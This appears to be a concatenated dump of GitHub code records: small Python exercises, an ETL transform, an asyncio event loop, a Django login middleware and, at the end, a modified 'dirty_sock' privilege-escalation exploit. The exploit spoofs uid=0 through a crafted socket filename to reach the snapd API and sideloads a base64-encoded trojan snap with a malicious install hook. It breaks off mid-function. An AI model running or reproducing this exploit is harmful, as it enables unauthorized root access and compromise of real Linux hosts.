computador))","repo_name":"MunhozRufino/estudos-python","sub_path":"exercicios/condições/ex28.py","file_name":"ex28.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"44872161518","text":"import sys\n\nnum = int(sys.stdin.readline())\n\ncount = 0\nfor i in range(num):\n word = sys.stdin.readline().rstrip()\n spell = []; switch = False\n for j in range(len(word) - 1):\n if word[j + 1] != word[j] and word[j + 1] not in spell:\n spell.append(word[j])\n elif word [j + 1] != word[j] and word[j + 1] in spell:\n switch = True\n break\n\n if switch == False:\n count += 1\n\nprint(count)","repo_name":"Quinsie/BOJ","sub_path":"Python/BOJ_1316_그룹 단어 체커.py","file_name":"BOJ_1316_그룹 단어 체커.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"8021143965","text":"import pandas as pd\nimport os \nfrom dags.ETL_S3_Postgres.Transform.Transform import Transform_df\n\nclass Transform_location_df(Transform_df):\n def extract_var(self):\n filePath = os.path.join(self.root_dir, \"Customers.csv\")\n customer_df = pd.read_csv(filePath)\n\n filePath = os.path.join(self.root_dir, \"Shipments.csv\")\n shipment_df = pd.read_csv(filePath)\n\n self.customer_df = customer_df[['Address','Postal code', 'City', 'State', 'Country']]\n self.shipment_df = shipment_df['Destination']\n\n def transform(self):\n self.customer_df['Address_Postal_code'] = self.customer_df['Address'].astype('str') + '-' + self.customer_df['Postal code'].astype('str')\n self.customer_df.drop(columns=['Address', 'Postal code'], inplace=True)\n\n address_arr = [address.split(',') for address in self.shipment_df]\n\n location_dict = {}\n location_dict['Address'] = [address[0] for address in address_arr]\n location_dict['Postal code'] = [address[4] for address in address_arr]\n location_dict['City'] = [address[1] for address in address_arr]\n location_dict['State'] = [address[2] for address in address_arr]\n location_dict['Country'] = [address[3] for address in address_arr] \n\n location_df = pd.DataFrame(location_dict)\n location_df['Address_Postal_code'] = location_df['Address'].astype('str') + '-' + location_df['Postal code'].astype('str')\n location_df.drop(columns=['Address', 'Postal code'], inplace=True)\n\n # concat customer_df and location_df\n self.df = pd.concat([self.customer_df, location_df])\n self.df = self.df[['Address_Postal_code', 'City', 'State', 'Country']]\n self.df.drop_duplicates(subset=['Address_Postal_code'], inplace=True)\n\ndef Transform_locations(Name, filePath):\n location = Transform_location_df(Name, filePath)","repo_name":"Dctrg25/Batch_Processing","sub_path":"dags/ETL_S3_Postgres/Transform/Transform_location.py","file_name":"Transform_location.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"2351347577","text":"from calendar import c\nfrom collections import Counter\nfrom itertools import count\nl = [1,2,3,4,1,2,3,1,2,1]\nprint(Counter(l))\n\np = \"palabares\"\nprint(Counter(p))\n\nanimales = \"gato perro canario perro canario perro\"\nprint(Counter(animales))\n\nc = Counter(animales.split())\n\nc.most_common(2)\nprint(c)\n\nl = [10,20, 30, 40, 10, 20, 30, 10, 20, 10]\nc = Counter(l)\nc.items()\nc.keys()\nprint(c) \n\n","repo_name":"Mian2912/Python","sub_path":"malla/udemy/jupyter/colecciones.py","file_name":"colecciones.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"12235698701","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport concurrent\nimport logging\nimport pprint\nimport signal\nimport socket\nimport sys\nimport time\n\nfrom . import logic\n\n\nlogger = logging.getLogger(__name__);\n\n\nclass EventProcessor():\n '''Class for providing event processing for the application (uses an asyncio event loop)'''\n\n def __init__(self, config):\n '''Constructor'''\n self.config = config\n self.loop = asyncio.get_event_loop()\n # no longer working with Python 3.10: self.queue = asyncio.Queue(loop=self.loop)\n self.queue = asyncio.Queue(**({\"loop\": self.loop} if sys.version_info[:2] < (3, 10) else {}))\n self.logic = logic.Logic(config, self.enqueue)\n\n def handle_hup(self, signum, frame):\n '''Handle the SIGHUP signal'''\n logger.info('Signal \"SIGHUP\" received; reloading config')\n self.logic.initialize_data()\n\n def handle_exception(self, loop, context):\n '''Handler for exceptions in coroutines'''\n if isinstance(context.get('exception'), asyncio.CancelledError):\n logger.debug('Async event loop cancelled')\n else:\n logging.error('Caught exception: [{e}] [{m}] [{f}]'.format(e=context.get('exception', ''), m=context.get('message'), f=context.get('future')))\n\n def eventloop(self):\n '''Run the event processing loop'''\n #self.loop.set_debug(logger.getEffectiveLevel() <= logging.DEBUG) # in case of INFO, WARN, ERROR,... do not go into debug mode\n try: \n self.loop.set_exception_handler(self.handle_exception)\n self.loop.run_until_complete(self.run_async()) \n finally:\n for task in asyncio.Task.all_tasks():\n task.cancel()\n self.loop.run_until_complete(self.loop.shutdown_asyncgens())\n self.loop.close()\n\n async def handle_message(self, reader, writer):\n '''Process incoming messages/commands'''\n data = await reader.read(100)\n message = data.decode()\n message = message.strip()\n addr = writer.get_extra_info('peername')\n logger.info(f'Received {message!r} from {addr!r}')\n if message == 'quit':\n raise KeyboardInterrupt\n #logger.debug(f'Sending: {message!r}')\n #writer.write(data)\n #await writer.drain()\n writer.close()\n\n async def run_periodically(self, cycle_time):\n '''Schedules tasks periodically each \"cycle_time\" (interval in seconds)'''\n while True:\n start = time.time()\n await self.logic.do_periodically()\n remaining_time = cycle_time - (time.time() - start)\n if remaining_time <= 0:\n logger.warning('Periodic tasks took longer than the cycle time; increase cycle time')\n await asyncio.sleep(remaining_time)\n\n async def enqueue(self, command, data):\n '''Enqueues an item in the event queue'''\n await self.queue.put({'command': command, 'data': data})\n\n async def serve_queue(self):\n '''Serve the event queue asynchronously'''\n while True:\n item = await self.queue.get()\n await self.logic.process_queue(item)\n\n async def run_async(self):\n '''Asynchronously executed code'''\n # Periodic tasks\n cycle_time = self.config.cycle_time\n task_periodic = asyncio.ensure_future(self.run_periodically(cycle_time))\n # Work queue\n task_queue = asyncio.ensure_future(self.serve_queue())\n # Listener for receiving commands\n #THIS IS WORKING BUT CURRENTLY NOT NEEDED\n #server = await asyncio.start_server(self.handle_message, '127.0.0.1', 8888) \n #addr = server.sockets[0].getsockname()\n #print(f'Serving on {addr}')\n #task_server = asyncio.ensure_future(server.serve_forever())\n task_server = asyncio.ensure_future(asyncio.sleep(1)) # TEMPORARY REPLACEMENT\n # Wait for all tasks to finish\n await asyncio.gather(task_periodic, task_queue, task_server)\n\n\ndef run(config):\n '''Creates an instance and runs it'''\n evt = EventProcessor(config)\n signal.signal(signal.SIGHUP, evt.handle_hup)\n evt.eventloop()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"towalink/wgtrack","sub_path":"src/wgtrack/eventprocessor.py","file_name":"eventprocessor.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"34191215088","text":"\"\"\"Disc module.\"\"\"\nimport math\n\n\nclass Disc:\n \"\"\"Disc.\"\"\"\n\n def __init__(self, center, radius):\n \"\"\"Receives information.\"\"\"\n self.center = center if isinstance(center, tuple) else center.coords\n self.radius = radius\n\n def __repr__(self):\n \"\"\"Representation of the class object.\"\"\"\n x, y = self.center\n r = format(self.radius**2, \".2f\")\n\n if x == 0:\n x_str = f\"(x)**2\"\n elif x > 0:\n x = format(x, \".2f\")\n x_str = f\"(x-{x})**2\"\n else:\n x = format(x, \".2f\")\n x_str + f\"(x+{x})**2\"\n\n if y == 0:\n y_str = f\"(y)**2\"\n elif y > 0:\n y = format(y, \".2f\")\n y_str = f\"(y-{y})**2\"\n else:\n y = format(y, \".2f\")\n y_str + f\"(y+{y})**2\"\n\n return f\"{x_str} + {y_str} = {r}\"\n\n def is_touching(self, near):\n \"\"\"Checks whether discs are touching each other.\"\"\"\n x1, y1 = self.center\n x2, y2 = near.center\n distance = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n print(distance)\n print(self.radius + near.radius)\n\n if distance < abs(self.radius - near.radius):\n return False\n if distance == 0 and self.radius == near.radius:\n return False\n if distance >= self.radius + near.radius:\n return True\n\n def inscribe_discs(self):\n \"\"\"Inscribes discs.\"\"\"\n new_x1 = self.center[0] - 0.5 * self.radius\n new_x2 = self.center[0] + 0.5 * self.radius\n\n new_disc1 = Disc((new_x1, self.center[1]), self.radius * 0.5)\n new_disc2 = Disc((new_x2, self.center[1]), self.radius * 0.5)\n\n return new_disc1, new_disc2\n\n def transform_disc(self, num):\n \"\"\"Transforms disc.\"\"\"\n self.radius += num\n\n def transformed_disc(self, num):\n \"\"\"Transformed disc.\"\"\"\n a = Disc(self.center, self.radius).transform_disc(num)\n return a\n\n\nclass Center:\n \"\"\"Center of the disc.\"\"\"\n\n def __init__(self, x, y):\n \"\"\"Receives information.\"\"\"\n self.coords = (x, y)\n\n def __repr__(self):\n \"\"\"Representation of center.\"\"\"\n return f\"Center is x={self.coords[0]}, y={self.coords[1]}\"\n","repo_name":"vbshuliar/Programming_Projects_and_Labs_from_Ukrainian_Catholic_University","sub_path":"02/programming/exams/middle/01/disc.py","file_name":"disc.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"736742324","text":"\"\"\"\nThur Oct 31, 2019\nStacy Bridges\n\n\"\"\"\nimport re, os, sys\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nimport numpy as np\n\n# get input file\nfolder_path = os.path.dirname(os.path.abspath(__file__))\ninfile = folder_path + '\\\\db_data_org_electrical_short_wx_v1.xlsx'\noutfile = folder_path + '\\\\api_in_ids.csv'\n\n# get dataframe/column\ndf_tender = pd.read_excel(infile, sheet_name=0) # read file into dataframe\nmpns = df_tender['ManufacturerPartNo']\n\n# identify search pattern\nRS_regex='\\d{3}[-]\\d{3,4}'\n\n# print search results to console\nresults = []\nfor row in mpns:\n results.append(re.findall(RS_regex,str(row)))\nwith open(outfile, 'w') as ofile:\n ofile.write('RS Code')\n ofile.write('\\n')\n id_count = 0\n for i in results:\n if len(i)>0:\n id_count += 1\n print(i[0])\n ofile.write(i[0])\n ofile.write('\\n')\n else:\n ofile.write('\\n')\n\nprint('{} codes extracted and written to:'.format(id_count))\nprint(outfile)\n","repo_name":"stcybrdgs/NERS---Console-Driver","sub_path":"regex_test.py","file_name":"regex_test.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"34300926735","text":"# (Importing module item)\n# Using from module import some_item:\n\nfrom math import pow\n\nresult_1 = result_1 = pow(2,4)\nprint(\"result is \" + str(result_1))\n\nfrom math import sqrt\nresult_2 = sqrt(16)\nprint(result_2)\n\nfrom random import randint\n\nresult_3 = randint(0,100)\nprint(\"random integer from 0-100 is: \" + str(result_3))\n\nfrom random import shuffle\n\nwords = [\"car\", \"house\", \"boat\", \"bicycle\", \"plane\"]\nprint(\"List of words: \", words)\n\nshuffle(words)\nprint(\"Words after shuffling: \", words)\n\nfrom random import choice\n\nresult_4 = choice(words)\nprint(\"Random choice of words: \", result_4)","repo_name":"Sebarusci/Brown-AI-course","sub_path":"Python_Basics_4.py","file_name":"Python_Basics_4.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"40238550288","text":"from typing import List\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n ln = len(prices)\n if ln < 2:\n return 0\n prof = 0\n has = False\n for i in range(ln-1):\n if prices[i] < prices[i+1] and not has:\n has = True\n prof-=prices[i]\n if prices[i] > prices[i+1] and has:\n has = False\n prof+=prices[i]\n if has :\n prof+=prices[-1]\n return prof","repo_name":"sergunSpb/leetcode_practice","sub_path":"122. Best Time to Buy and Sell Stock II/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"11093156171","text":"from django.http import JsonResponse,HttpResponse\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.utils.deprecation import MiddlewareMixin\nfrom APP.models import Flyuser\nREQUILE_LOGIN_JSON = [\n # '/axf/addtocart/',\n # '/axf/subtocart/',\n # '/axf/changecartstate/',\n # '/axf/makeorder/',\n\n]\nREQUILE_LOGIN = [\n '/fly/bupi/',\n '/fly/bed/',\n '/fly/sign/',\n '/fly/jiagong/',\n '/fly/index/',\n '/fly/',\n '/fly/indb/',\n '/fly/orderlist/',\n '/fly/sendcart/',\n '/fly/sendorderlist/',\n '/fly/signlistbyworker/',\n '/fly/signdetail/',\n]\n\nREQUILE_FEI = [\n '/fly/bupi/',\n '/fly/orderlist/',\n '/fly/buboss/',\n '/fly/butype/',\n '/fly/indb/',\n\n]\n\nclass LoginMiddleware(MiddlewareMixin):\n def process_request(self,request):\n # if request.path in REQUILE_LOGIN_JSON:\n # user_id = request.session.get('user_id')\n # if user_id:\n # try:\n # print('哈哈')\n # user = Flyuser.objects.get(pk=user_id)\n # request.user = user #将user赋值给request作为一个参数\n # except:\n # print('哈哈哈')\n # data={\n # 'status':301,\n # 'msg':'user not avaliable'\n # }\n # # return redirect(reverse('axf:login')),由于重定向是浏览的行为,所以不能直接在中间件(也就是服务器)重定向,ps:由于这个请求是在点击+时js文件geujson触发的,所以必须返回jason response\n # return JsonResponse(data=data)\n # else:\n # print('哈哈哈哈')\n # data = {\n # 'status': 301,\n # 'msg': 'user not login'\n # }\n # return JsonResponse(data=data) #如果发现用户没有登录,中间件这里直接返回浏览器,不再到views\n # # return redirect(reverse('axf:login'))\n\n if request.path in REQUILE_LOGIN :\n user_id = request.session.get('user_id')\n if user_id:\n try:\n user = Flyuser.objects.get(pk=user_id)\n print(user.u_username)\n if user.u_username!='jxb'and request.path in REQUILE_FEI:\n return HttpResponse(\"当前用户不允许查看!\")\n\n # request.user = user # 将user赋值给request作为一个参数\n except:\n return redirect(reversed('fly:login')),\n else:\n print('嘿嘿嘿')\n return redirect(reverse('fly:login'))","repo_name":"JiangTaoGZU/Flypant-calculate-system","sub_path":"middleware/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"2655476372","text":"class Solution:\n def removeElement(self, nums, val):\n if not nums:\n return 0\n l = 0\n r = len(nums) - 1\n while l < r:\n while l < r and nums[l] != val:\n l += 1\n while l < r and nums[r] == val:\n r -= 1\n nums[l], nums[r] = nums[r], nums[l]\n return nums","repo_name":"ffchic/leetcode","sub_path":"移除元素/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"42515901597","text":"from odoo import models, fields, api, _\nfrom odoo.tools.misc import formatLang\nfrom datetime import timedelta\nfrom odoo.exceptions import UserError\n\n\nclass TreasuryForecast(models.Model):\n _name = \"treasury.forecast\"\n _order = \"date_start desc\"\n _description = \"Treasury Forecast\"\n\n # General data\n name = fields.Char('Name', required=True)\n active = fields.Boolean('Active', default=True)\n statement_id = fields.Many2one(string='Statement', comodel_name='account.bank.statement')\n state = fields.Selection([('open', 'Open'), ('closed', 'Closed')], default='open')\n company_id = fields.Many2one(comodel_name='res.company', string='Company', required='True',\n default=lambda self: self.env.user.company_id,)\n date_start = fields.Date(string='Start Date', required=True)\n date_end = fields.Date(string='End Date', required=True)\n initial_balance = fields.Float(string='Initial balance', compute='compute_initial_balance',\n store=True)\n final_balance = fields.Float(string='Final balance', compute='compute_final_balance',\n store=True)\n previous_forecast_id = fields.Many2one(comodel_name='treasury.forecast', string='Previous forecast')\n forecast_template_id = fields.Many2one(comodel_name='treasury.forecast.template', string='Forecast Template')\n periodic_saldo = fields.Float(string='Periodic saldo', compute='_compute_periodic_saldo', store=True)\n hide_analysis = fields.Boolean(string='Hide analysis')\n force_initial_balance = fields.Float(string='Force initial balance')\n set_mass_date = fields.Date(string='Set mass date')\n\n # detailed analysis fields and text field for reporting table\n payables = fields.Float('Payables', compute='_compute_payables', store=True)\n open_payables = fields.Float('Open payables', compute='_compute_payables', store=True)\n receivables = fields.Float('Receivables', compute='_compute_receivables', store=True)\n open_receivables = fields.Float('Open receivables', compute='_compute_receivables', store=True)\n other_flows = fields.Float('Other flows', compute='_compute_other_flows', store=True)\n open_flows = fields.Float('Open flows', compute='_compute_other_flows', store=True)\n forecast_analysis = fields.Text(string='Treasury Analysis', compute='_compute_periodic_saldo')\n\n # Payables and receivables\n receivable_ids = fields.One2many(\n comodel_name='account.move.line', inverse_name='forecast_id',\n domain=[('debit', '>', 0), ('journal_id.type', '!=', 'bank')],\n string='Receivables details')\n payable_ids = fields.One2many(\n comodel_name='account.move.line', inverse_name='forecast_id',\n domain=[('credit', '>', 0), ('journal_id.type', '!=', 'bank')],\n string='Payables details')\n recurrent_cost_ids = fields.One2many(\n comodel_name='account.bank.statement.line', inverse_name='treasury_forecast_id',\n string='Cost/revenues', domain=['|', ('statement_fp', '!=', True),\n '&', ('statement_fp', '!=', False),\n ('cf_forecast', '!=', False)], store=True)\n\n @api.depends('payable_ids', 'payable_ids.amount_residual')\n def _compute_payables(self):\n for item in self:\n total, due = 0.0, 0.0\n for line in item.payable_ids:\n total += line.balance\n due += line.amount_residual\n item.payables, item.open_payables = total, due\n\n @api.depends('receivable_ids', 'receivable_ids.amount_residual')\n def _compute_receivables(self):\n for item in self:\n total, due = 0.0, 0.0\n for line in item.receivable_ids:\n total += line.balance\n due += line.amount_residual\n item.receivables, item.open_receivables = total, due\n\n @api.depends('recurrent_cost_ids', 'recurrent_cost_ids.cf_forecast',\n 'recurrent_cost_ids.amount')\n def _compute_other_flows(self):\n for item in self:\n total, due = 0.0, 0.0\n for line in item.recurrent_cost_ids:\n total += line.amount_main_currency\n fp = line.statement_id.treasury_planning\n due += line.amount_main_currency if fp else 0\n item.other_flows, item.open_flows = total, due\n\n @api.onchange('previous_forecast_id')\n def _onchange_date_saldo(self):\n for item in self:\n if item.previous_forecast_id:\n date_draft = fields.Date.from_string(\n item.previous_forecast_id.date_end) + timedelta(days=1)\n item.update({\n 'date_start': fields.Date.to_string(date_draft),\n 'date_end': item.date_start,\n 'initial_balance': item.previous_forecast_id.final_balance\n })\n\n def _compute_date(self, begin, end, day):\n if day >= 0:\n date_draft = fields.Date.from_string(begin) + timedelta(days=day-1)\n else:\n date_draft = fields.Date.from_string(end) + timedelta(days=day+1)\n date = fields.Date.to_string(date_draft)\n return date\n\n @api.multi\n def check_constrains(self):\n self.ensure_one()\n # check that there is at least one journal\n if not self.forecast_template_id:\n raise UserError(_(\"Please select a forecast template.\"))\n\n @api.multi\n def compute_forecast_lines(self):\n for item in self:\n self.check_constrains()\n line_ids = []\n for cost in item.forecast_template_id.recurring_line_ids:\n date = self._compute_date(item.date_start, item.date_end, cost.day)\n statement_id = item.forecast_template_id.bank_statement_id.id\n\n line_ids.append((0, 0, {\n 'name': cost.name,\n 'ref': cost.ref,\n 'partner_id': cost.partner_id.id,\n 'treasury_date': date,\n 'date': date,\n 'amount': cost.amount,\n 'cf_forecast': True,\n 'treasury_forecast_id': item.id,\n 'statement_id': statement_id,\n }))\n item.update({'recurrent_cost_ids': line_ids})\n item.forecast_template_id = \"\"\n\n @api.depends('payables', 'open_payables', 'receivables',\n 'open_receivables', 'other_flows', 'open_flows')\n def _compute_periodic_saldo(self):\n for item in self:\n\n item.periodic_saldo = item.open_receivables + item.open_payables + item.other_flows\n\n # creating the forecast analysis table\n header = (_(\"\"), _(\"Receivables\"), _(\"Payables\"), _(\"Other\"))\n report_lines = (\n (_(\"Total\"), item.receivables, item.payables, item.other_flows),\n (_(\"Open\"), item.open_receivables, item.open_payables, item.open_flows)\n )\n\n item.forecast_analysis = self._tuple_to_table(\n 'forecast', '', header, None, report_lines)\n\n def _tuple_to_table(self, kind, css, header, balances, report_lines):\n if kind == 'forecast':\n # creating the table header\n result = \" \\n\".format(css)\n for head in header:\n result += \"\".format(head)\n result += \"\\n\\n\"\n if balances:\n for balance in balances:\n result += \"\".format(formatLang(\n self.env, balance, 2, monetary=True))\n result += \"\\n\"\n\n # creating single lines\n for line in report_lines:\n table_line = \"\"\n for value in line:\n if isinstance(value, str):\n table_line += \"\".format(value)\n elif isinstance(value, float):\n table_line += \"\".format(\n formatLang(self.env, value, 2, monetary=True))\n table_line += \"\"\n result += table_line\n\n result += \"
{}
{}
{} {}
\"\n return result\n\n @api.multi\n def compute_forecast_data(self):\n for item in self:\n\n # compute treasury date of all account moves\n aml_obj = self.env['account.move.line']\n move_list = aml_obj.search([\n ('treasury_planning', '!=', False),\n ('date_maturity', '>=', item.date_start),\n ('date_maturity', '<=', item.date_end),\n ('forecast_id', '=', False),\n ])\n move_list.update({'forecast_id': item.id})\n\n bank_line_obj = self.env['account.bank.statement.line']\n bank_line_list = bank_line_obj.search([\n ('date', '>=', item.date_start),\n ('date', '<=', item.date_end),\n ('treasury_forecast_id', '=', False),\n ])\n bank_line_list.update({'treasury_forecast_id': item.id})\n\n @api.depends('previous_forecast_id.final_balance', 'force_initial_balance')\n def compute_initial_balance(self):\n for item in self:\n if item.previous_forecast_id.final_balance:\n item.initial_balance = item.previous_forecast_id.final_balance\n\n if item.force_initial_balance != 0.0:\n item.initial_balance = item.force_initial_balance\n\n @api.depends('initial_balance', 'periodic_saldo')\n def compute_final_balance(self):\n for item in self:\n item.final_balance = item.initial_balance + item.periodic_saldo\n\n @api.multi\n def refresh_page(self):\n pass\n\n @api.multi\n def sett_mass_date(self):\n \"\"\"Once the month is finished we need to move all open items to the next\n forecast. We move all lines with residual different to 0 to the first day.\"\"\"\n self.ensure_one()\n if not self.set_mass_date:\n raise UserError(_(\"Please set the date to be set to all open operations.\"))\n open_moves = self.receivable_ids.filtered(lambda r: r.amount_residual != 0.0)\n open_moves += self.payable_ids.filtered(lambda r: r.amount_residual != 0.0)\n open_moves.update({'treasury_date': self.set_mass_date})\n self.set_mass_date = False\n","repo_name":"crusardi/YK","sub_path":"treasury_forecast/models/treasury_forecast.py","file_name":"treasury_forecast.py","file_ext":"py","file_size_in_byte":10464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"8547213896","text":"#!/usr/bin/env python3\nimport string\nimport random\nimport socket\nimport base64\nimport time\nimport sys\nimport os\n\n'''\n\nORINIAL FINDER CREDITS : Chris Moberly (@init_string) from The Missing Link.\nDetails || https://initblog.com/2019/dirty-sock \nModified by @D3fa1t_ ( https://d3fa1t.ninja ) \n\n'''\n\nTROJAN_SNAP = \"\" \n\nTROJAN_BASE_SNAP = ('''\naHNxcwcAAACe5/ZcAAACAAEAAAABABEA6wEBAAQAAADYAAAAAAAAAEQHAAAAAAAAPAcAAAAAAAD/\n/////////0EFAAAAAAAAOwYAAAAAAADsBgAAAAAAAC4HAAAAAAAAIyEvYmluL2Jhc2gKCnRvdWNo\nIC9ldGMvUE9DSEFIQSAjQUF''' + 'BQUF' * 340 + '''BQQpuYW1lOiBkaXJ0eS1zb2NrCnZlcnNpb246ICcwLjEnCnN1bW1hcnk6IEVt\ncHR5IHNuYXAsIHVzZWQgZm9yIGV4cGxvaXQKZGVzY3JpcHRpb246ICdTZWUgaHR0cHM6Ly9naXRo\ndWIuY29tL2luaXRzdHJpbmcvZGlydHlfc29jawoKICAnCmFyY2hpdGVjdHVyZXM6Ci0gYW1kNjQK\nY29uZmluZW1lbnQ6IGRldm1vZGUKZ3JhZGU6IGRldmVsCviACQD9AQAAAACX5/ZcAwAAAAAAAAAA\nAAAAIgQAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAP////8BAP0BAAAAAO3k9lwCAAAAAAAAAAIA\nAAAeAAAAAQAAAAIAtAEAAAAA+Ln1XAQAAAAAAAAAAAAAACIEAAC/AAAAAQD9AQAAAAD4ufVcAQAA\nAAAAAAADAAAALQAbAAcAAAABAP0BAAAAAPnk9lwGAAAAAAAAAAIAAAAeAEUABQAAAAEA/QEAAAAA\n+Ln1XAUAAAAAAAAAAwAAABwAYAAHAAAAAQD9AQAAAAD4ufVcBwAAAAAAAAAEAAAAJwB5AAgAAACd\ngAAAAAAAAAAAAwAAAAAAAAACAAYAaW5zdGFsbAEAAAAAAAAAAgAAADgAAAABAAQAaG9va3NYAAIA\nAgAIAHNuYXAueWFtbAAAAAAAAAAAAwAAAAAAAAACAAYAaW5zdGFsbAAAAAAAAAAABgAAAJgAAAAB\nAAQAaG9va3MBAAAAAAAAAAEAAAB4AAAAAQADAG1ldGG4AAQAAQADAHNuYXAQgGAAAAAAAAAA4QQA\nAQAAAADaBgAAAAAAADiAeAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAWAAAAAAAAAC4AAAAAAAAAJgA\nAAAAAAAA2AAAAAAAAAD0BgAAAAAAAASA6AMAADYH'''+'A'*2990 + '==')\n\ndef check_args():\n \"\"\"Return short help if any args given\"\"\"\n if len(sys.argv) > 1:\n print(\"\\n\\n\"\n \"No arguments needed for this version. Simply run and enjoy.\"\n \"\\n\\n\")\n sys.exit()\n\ndef create_sockfile():\n \"\"\"Generates a random socket file name to use\"\"\"\n alphabet = string.ascii_lowercase\n random_string = ''.join(random.choice(alphabet) for i in range(10))\n dirty_sock = ';uid=0;'\n\n # This is where we slip on the dirty sock. This makes its way into the\n # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion\n # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.\n sockfile = '/tmp/' + random_string + dirty_sock\n\n print(\"[+] Slipped dirty sock on random socket file: \" + sockfile)\n\n return sockfile\n\ndef bind_sock(sockfile):\n \"\"\"Binds to a local file\"\"\"\n # This exploit only works if we also BIND to the socket after creating\n # it, as we need to inject the dirty sock as a remote peer in the\n # socket's ancillary data.\n print(\"[+] Binding to socket file...\")\n client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n client_sock.bind(sockfile)\n\n # Connect to the snap daemon\n print(\"[+] Connecting to snapd API...\")\n client_sock.connect('/run/snapd.socket')\n\n return client_sock\n\ndef delete_snap(client_sock):\n \"\"\"Deletes the trojan snap, if installed\"\"\"\n post_payload = ('{\"action\": \"remove\",'\n ' \"snaps\": [\"dirty-sock\"]}')\n http_req = ('POST /v2/snaps HTTP/1.1\\r\\n'\n 'Host: localhost\\r\\n'\n 'Content-Type: application/json\\r\\n'\n 'Content-Length: ' + str(len(post_payload)) + '\\r\\n\\r\\n'\n + post_payload)\n\n # Send our payload to the snap API\n print(\"[+] Deleting trojan snap (and sleeping 5 seconds)...\")\n client_sock.sendall(http_req.encode(\"utf-8\"))\n\n # Receive the data and extract the JSON\n http_reply = client_sock.recv(8192).decode(\"utf-8\")\n\n # Exit on probably-not-vulnerable\n if '\"status\":\"Unauthorized\"' in http_reply:\n print(\"[!] System may not be vulnerable, here is the API reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # Exit on failure\n if 'status-code\":202' not in http_reply:\n print(\"[!] Did not work, here is the API reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # We sleep to allow the API command to complete, otherwise the install\n # may fail.\n time.sleep(5)\n\ndef install_snap(client_sock):\n \"\"\"Sideloads the trojan snap\"\"\"\n\n # Decode the base64 from above back into bytes\n blob = base64.b64decode(TROJAN_SNAP)\n\n # Configure the multi-part form upload boundary here:\n boundary = '------------------------f8c156143a1caf97'\n\n # Construct the POST payload for the /v2/snap API, per the instructions\n # here: https://github.com/snapcore/snapd/wiki/REST-API\n # This follows the 'sideloading' process.\n post_payload = '''\n--------------------------f8c156143a1caf97\nContent-Disposition: form-data; name=\"devmode\"\n\ntrue\n--------------------------f8c156143a1caf97\nContent-Disposition: form-data; name=\"snap\"; filename=\"snap.snap\"\nContent-Type: application/octet-stream\n\n''' + blob.decode('latin-1') + '''\n--------------------------f8c156143a1caf97--'''\n\n\n # Multi-part forum uploads are weird. First, we post the headers\n # and wait for an HTTP 100 reply. THEN we can send the payload.\n http_req1 = ('POST /v2/snaps HTTP/1.1\\r\\n'\n 'Host: localhost\\r\\n'\n 'Content-Type: multipart/form-data; boundary='\n + boundary + '\\r\\n'\n 'Expect: 100-continue\\r\\n'\n 'Content-Length: ' + str(len(post_payload)) + '\\r\\n\\r\\n')\n\n # Send the headers to the snap API\n print(\"[+] Installing the trojan snap (and sleeping 8 seconds)...\")\n client_sock.sendall(http_req1.encode(\"utf-8\"))\n\n # Receive the initial HTTP/1.1 100 Continue reply\n http_reply = client_sock.recv(8192).decode(\"utf-8\")\n\n if 'HTTP/1.1 100 Continue' not in http_reply:\n print(\"[!] Error starting POST conversation, here is the reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # Now we can send the payload\n http_req2 = post_payload\n client_sock.sendall(http_req2.encode(\"latin-1\"))\n\n # Receive the data and extract the JSON\n http_reply = client_sock.recv(8192).decode(\"utf-8\")\n\n # Exit on failure\n if 'status-code\":202' not in http_reply:\n print(\"[!] Did not work, here is the API reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # Sleep to allow time for the snap to install correctly. Otherwise,\n # The uninstall that follows will fail, leaving unnecessary traces\n # on the machine.\n time.sleep(8)\n\ndef print_success():\n \"\"\"Prints a success message if we've made it this far\"\"\"\n print(\"[!] Command Executed Successfully \\n\\n\")\n \n\n\ndef main():\n \"\"\"Main program function\"\"\"\n\n # Create a random name for the dirty socket file\n sockfile = create_sockfile()\n\n # Bind the dirty socket to the snapdapi\n client_sock = 